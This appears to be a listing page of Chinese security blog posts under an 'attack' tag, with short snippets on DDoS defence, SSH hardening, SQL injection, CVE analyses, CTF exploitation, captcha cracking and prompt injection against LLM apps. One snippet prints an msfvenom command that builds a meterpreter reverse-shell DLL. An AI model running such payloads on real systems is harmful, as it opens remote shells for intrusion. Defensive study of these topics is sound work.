攻击第12页

自动化破解滑块验证码：使用Python和Selenium的技巧和实践

自动化破解验证码：使用Python和Selenium验证码，旨在防止自动化机器人攻击网站的安全工具，已成为网络应用程序的常见安全屏障。其中，滑块

ttocr66·2025-06-01 20:44

恶意软件新动向：安全专家需关注的六大趋势

这些工具让攻击

漠月瑾·2025-06-01 19:07

Agent平台安全实战：构建企业级AI防线（含20+漏洞修复方案）

文章目录一、引言：AI时代的安全新挑战1.1智能体安全事件全景扫描1.2安全护栏的核心价值1.3本文技术路线图二、安全威胁建模：知己知彼2.1智能体特有攻击面2.2STRIDE威胁分类2.3风险评估矩阵三

游戏人生的NPC·2025-06-01 13:55

端口 3389 服务 ms - wbt - server 漏洞修复方法

常见的漏洞包括加密算法不安全、协议版本存在缺陷、证书问题以及可能的未授权访问等，这些漏洞可能导致攻击者窃取信息、执行恶意代码或进行中间人攻击等17。

芊言凝语·2025-06-01 11:37

Java 权威方案：彻底修复 OPTIONS 方法安全漏洞（附企业级案例与测试指南）

然而，未授权的OPTIONS请求可能导致以下风险：1.真实漏洞案例：Optionsbleed漏洞（CVE-2017-9798）攻击者通过发送特定的OPTIONS请求，可绕过ApacheHTTP服务器的访问控制

混进IT圈·2025-06-01 10:35

【网络安全常用术语解读：什么是0day、1day、nday漏洞】

脆弱性攻击的时间窗被称作脆弱性窗口。通常情况下，一个安全漏洞的时间越久，攻击者就会有更多的机会去攻击它。

伟祺top·2025-06-01 06:34

无需自建高防：APP遭遇DDoS的解决方案

2021年，某知名电商平台在"618"大促期间遭遇DDoS攻击，支付系统瘫痪近2小时；2022年，一款热门手游在新版本上线时因CC攻击导致服务器崩溃。

Xinstall渠道统计&安全加速·2025-06-01 01:02

2025年DDoS混合CC攻击防御全攻略：构建智能弹性防护体系

2025年，DDoS与CC混合攻击已成为企业安全的“头号威胁”。攻击者利用AI伪造用户行为、劫持物联网设备发起T级流量冲击，同时通过高频请求精准消耗应用层资源，传统单点防御几近失效。

上海云盾商务经理杨杨·2025-06-01 01:00

漏洞扫描与软件安全测试的实践指南

漏洞扫描与软件安全测试的实践指南背景简介随着网络攻击的日益频繁和复杂，组织和个人对于安全防护的需求也变得越来越重要。漏洞扫描与软件安全测试是保护系统免受恶意攻击的第一道防线。

轮胎技术Tyretek·2025-05-31 21:31

微隔离是什么，有什么作用

然而，这也意味着一旦内部的设备被威胁或遭到入侵，攻击者可能会在整个安全区域内进行横向移动和渗透。

德迅云安全-小娜·2025-05-31 21:57

基础入门-Web应用&架构搭建&域名源码&站库分离&MVC模型&解析受限&对应路径

3.域名解析服务器IP(DNS解析)2.分站(主要做网站扫描来找出分站拿出信息)1.收集更多的分站对分站的攻击有概率影响到主站2.分站可能也解析到主站的IP3.通过子域名收集3.端口站1.http默认解析到

m0_64332920·2025-05-31 20:24

Emlog Pro 任意文件上传漏洞（CVE-2023-44974）

应急响应靶机训练-Web1漏洞原理/admin/plugin.php中存在任意文件上传漏洞使得攻击者能够通过上传构建的PHP文件来执行任意代码漏洞利用webshell上传（PHP木马）影响版本EmlogPro2.2.0

Point13reak·2025-05-31 13:04

Linux SSH弱密钥交换算法(Weak Key Exchange Algorithms)检查及修复

在Linux环境中，WeakKeyExchangeAlgorithms（弱密钥交换算法）是指存在安全漏洞的算法，这些算法可能被攻击者利用进行中间人攻击或其他形式的密码学攻击。

promise524·2025-05-31 10:47

Linux SSH安全之禁用CBC模式(SSH Server CBC Mode Ciphers)

在Linux系统中，CBC（CipherBlockChaining）模式的加密算法被认为存在安全隐患（例如可能被攻击者利用来进行PaddingOracle攻击）。

promise524·2025-05-31 10:47

漏洞分析 | kkFileView远程代码执行漏洞

近期，网宿安全演武实验室监测到kkFileView存在远程代码执行漏洞（网宿评分：危急，CVSS3.1评分：9.8）：远程攻击者无需身份认证，即可利用该漏洞覆盖任意⽂件，再调用被覆盖的文件实现远程代码执行

网宿安全演武实验室·2025-05-31 08:31

Nginx安全防护与HTTPS部署

如果不隐藏server的版本，会导致别有用心的人知晓服务的版本号，从而针对该版本进行攻击。

2401_83683659·2025-05-31 03:54

基于 UPX 与 exe2hex 的可执行文件压缩、转换与传输技巧

为了突破这些限制，渗透测试者与攻击者们精心钻研并掌握了一系列高超的技巧，其中文件压缩、加密以及格式转换等方法更是被广泛应用。本文将深入剖析如何巧妙运用UPX和exe2hex这两款强大工具来压缩、转换可

vortex5·2025-05-31 01:10

手机设备多？怎样设置IP保证不关联

2.流量行为误判：同一IP下多设备高频操作（如批量注册、爬虫）易被识别为“恶意攻击”。3.物理地址暴

九州ip动态·2025-05-31 00:05

小儿科软件：简易压力测试工具教程

它包括攻击测试和安全测试功能，可以模拟DDoS攻击，检查服务器的抗压能力和安全漏洞。软件可通过生成大量请求来测试服务器的响应速度、资源消耗和稳定性。同时，还可能包含自动化测试账户认证的文本文件，以

云山雾村·2025-05-30 23:25

Apptrace：APP安全加速解决方案

2021年，某知名电商平台在“618”大促期间遭遇DDoS攻击，支付系统瘫痪近2小时；2022年，一款热门手游在新版本上线时因CC攻击导致服务器崩溃。

tongjiwenzhang·2025-05-30 19:55

阿里云DDoS防护：万一被“黑”了，如何更换IP地址？

在如今这个网络世界，最让人提心吊胆的，莫过于遭遇**DDoS攻击（分布式拒绝服务攻击）**了。一旦被“黑”，你的网站可能瞬间瘫痪，业务停摆，损失那是实打实的！

国际云，接待·2025-05-30 17:42

DDoS攻击致瘫业务？腾讯防护体系实测：100Gbps攻击自动清洗

凌晨三点的“惊魂一刻”：腾讯云如何扛住100GbpsDDoS攻击？实测揭秘智能防护体系想象一下：凌晨三点，你收到服务器宕机警报——每秒超过80万次恶意请求正像海啸般冲击着你的业务系统！

国际云，接待·2025-05-30 17:42

【HW系列】—Log4j2、Fastjson、Shiro漏洞流量特征

文章目录Log4j2漏洞的流量特征及检测方法一、基础请求特征二、网络交互特征三、响应与日志特征四、绕过技术特征五、检测与防御建议Fastjson漏洞的流量特征解析一、请求构造特征二、响应行为特征三、攻击载荷特征四

枷锁—sha·2025-05-30 17:09

【HW系列】—目录扫描、口令爆破、远程RCE流量特征

绕过行为特征四、关联行为特征五、检测与防御建议口令爆破漏洞的流量特征及检测方法一、基础流量特征二、工具标识特征三、绕过行为特征四、响应关联特征五、检测与防御建议RCE漏洞的流量特征及检测方法一、请求构造特征二、攻击载荷特征三

枷锁—sha·2025-05-30 17:39

云安全战略新纪元：颠覆性DDoS防御与零信任架构的创新实践

下面呈现一篇虚拟的科技前沿文章，内容涵盖了云安全战略在DDoS攻击防御和零信任网络体系构建方面的最新进展。

大富大贵7·2025-05-30 16:33

论文阅读：2024 arxiv Prompt Injection attack against LLM-integrated Applications

WhiffeYF/article/details/142132328https://www.doubao.com/chat/6993930253668098速览这篇论文主要围绕大语言模型（LLM）集成应用的提示注入攻击展开

CSPhD-winston-杨帆·2025-05-30 14:49

红客 Linux 系统性全解析

红客Linux系统性全解析：从工具到实战的网络安全防御体系一、红客与Linux的深度关联红客（EthicalHacker）作为网络空间的守护者，其核心使命是通过模拟攻击行为发现系统漏洞，从而强化防御能力

conkl·2025-05-30 14:47

系统提权与持久化

攻击流程：生成恶意DLL并托管至SMB共享：msfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=192.168.1.10LPORT=4444-fdll>

Alfadi联盟萧瑶·2025-05-30 11:54

被忽视的 App 安全入口：资源文件暴露问题与 iOS 混淆实战（含 Ipa Guard 应用经验）

今天我想通过一个我们真实项目中的经历，讲讲iOS应用中的资源文件是如何成为攻击者的“金矿”，以及我们是如何通过包括IpaGuard在内的混淆工具链，逐步建立起资源级的安全防护体系的。

2501_91592143·2025-05-30 06:48

02-BTC-密码学原理对hash算法如果出现漏洞的思考

答：（1）攻击场景：伪造交易：攻击者可构造两个不同的交易（如正常交易和恶意双花交易）具有相同的TxID（交易哈希），欺骗节点接受无效交易。

weixin_44231698·2025-05-30 03:24

MySQL的PrepareStatement真的是预编译语句么？

通过使用PreparedStatement，可以预编译SQL语句，并且在执行时可以重复使用这个预编译的语句，这样可以提高执行效率并且增强安全性（特别是防止SQL注入攻击）。然而我在wir

蜀中孤鹰·2025-05-30 02:44

浏览器端错误监控实战：使用 Reporting API 捕获 CSP 违规并关联用户会话

在现代Web开发中，内容安全策略（CSP）是防止XSS、数据注入等攻击的关键防线。然而，仅靠CSP规则无法完全阻止攻击尝试，开发者还需要实时监控违规行为，并关联到具体用户会话，以便快速响应潜在威胁。

软考和人工智能学堂·2025-05-29 23:56

MongoDB 安全机制详解：全方位保障数据安全

然而，随着MongoDB的普及，其安全性也面临诸多挑战，如未授权访问、数据泄露和注入攻击等。因此，合理配置MongoDB的安全机制，是保障企业数据安全的关键。

vvilkin的学习备忘·2025-05-29 22:12

决策引擎与规则引擎在交易所业务风控中的建设思路、架构设

决策引擎与规则引擎在交易所业务风控中的建设思路一、引言：交易业务风控的核心挑战与行业趋势**1.1典型风险场景**-**市场操纵类**：高频对敲（每秒300+订单）、虚假挂单（占盘比>40%）、尾盘拉升-**账户安全类**：撞库攻击

王子文-上海·2025-05-29 20:35

模版注入漏洞详解

如果攻击者能够控制要呈现的模板，则他们将能够注入可暴露上下文数据，甚至在服务器上运行任意命令的表达式。测试方法确定使用的引擎查看引擎相关的文档，确定其安全机制以及自带的函数和变量需

_Poseidon·2025-05-29 18:21

深度解析渗透测试：概念、流程与实战应用

在网络安全领域，漏洞扫描如同基础体检，能发现系统潜在问题；而渗透测试则像是专业的深度诊断，以攻击者视角主动出击，探寻系统真正的安全风险。

白山云北诗·2025-05-29 17:44

防患未然 - SRE 的漏洞扫描与补丁管理之道

防患未然-SRE的漏洞扫描与补丁管理之道漏洞的生命周期与威胁理解漏洞如何产生和被利用，有助于我们认识到及时响应的重要性：发现(Discovery)：安全研究人员、软件供应商、白帽黑客甚至恶意攻击者可能会发现软件或系统中的安全缺陷

weixin_42587823·2025-05-29 09:52

蓝梦公司网络安全建设及加固

其核心问题包括防止未经授权的访问和数据篡改，确保个人隐私和商业机密的安全，以及保护国家基础设施免受网络攻击的威胁。

花旗121·2025-05-29 01:50

数据加密技术：守护网络通信安全的基石

根据统计，2024年全球因网络攻击造成的经济损失高达数万亿美元。而数据加密技术作为网络安全的核心防线之一，通过将明文转化为密文，有效抵御窃听、篡改等威胁。本文将

洋洋喜欢喝水·2025-05-29 01:49

工业互联网安全：智能制造背景下的安全挑战与对策

网络攻击与恶意软件的威胁日益增大，工业互联网系统通过互联网连接，成为网络攻击的潜在目标。供应链安全也是一个关键点，供应链中的任何环节安全漏洞都可能被利用，影响整个系统的安全性。

亿林网络安全事业部·2025-05-29 01:17

5.28 c++作业

classHero{intatk;intdef;intspd;inthp;public:构造函数4个属性的set，get接口voidequipWeapon(参数传入具体的武器){如果传入短剑：英雄增加1点攻击力和

三十一614·2025-05-28 21:21

SQL注入基础总结

答：SQL注入是比较常见的网络攻击方式之一，它不是利用OS的BUG来实现攻击，而是针对程序员编写时的疏忽，通过SQL语句实现无账号登陆，甚至篡改数据库。二、SQL注入的原理？

1erkeU·2025-05-28 21:50

mysql注入实验报告_网络安全实验报告第二章

利用TCP协议实现synflood攻击运行syn攻击程序，以靶机为目标主机对其发送syn数据包，查看目标主机状态。

卖扣杨·2025-05-28 18:55

SQL 注入分析与防护

一、概述SQL注入是一种代码注入技术，攻击者通过在输入字段中插入恶意SQL代码，改变数据库查询逻辑，从而绕过身份验证、访问敏感数据或对数据库进行恶意操作。

Orlando cron·2025-05-28 18:23

三、web安全-信息收集

1、信息搜集的重要性（1）明确攻击面信息搜集能让渗透测试人员清晰地勾勒出目标系统的边界，包括其网络拓扑结构、开放的服务端口、运行的软件系统等。

midsummer_woo·2025-05-28 14:01

如何避免使用eval()和with语句？

以下是分语言、分场景的详细指导：一、避免使用eval()的方法eval()的主要风险包括代码注入攻击、性能损耗和调试困难。

破碎的天堂鸟·2025-05-28 10:02

上讯信息运维管理审计系统imo.php存在命令执行漏洞(CNVD-2025-07703)

任何个人或组织不得利用本文内容从事未经许可的渗透测试、网络攻击或其他违法行为。使用者应确保其行为符合相关法律法规，并取得目标系统的明确授权。

Byp0ss403小号·2025-05-28 09:25

ret2libc：CTF Pwn 中的关键利用技巧

目录ret2libc：CTFPwn中的关键利用技巧一、原理二、利用步骤（一）查找漏洞并确定溢出点（二）获取system()函数和字符串“/bin/sh”的地址（三）构造攻击载荷（payload）（四）触发漏洞并执行攻击三

阿贾克斯的黎明·2025-05-28 08:19

实战：基于流量特征分析的Web应用防护系统搭建

场景背景某电商平台遭遇CC攻击导致API服务不可用，传统规则防护难以应对动态变化的攻击模式。本文将演示如何构建具备自适应能力的防护系统。

群联云防护小杜·2025-05-28 06:27

游戏行业DDoS防护：基于IP信誉库的实时拦截方案

典型攻防场景某MMORPG游戏开服时遭遇300GbpsUDP洪水攻击，导致登录服务器瘫痪。传统IP黑名单方式收效甚微。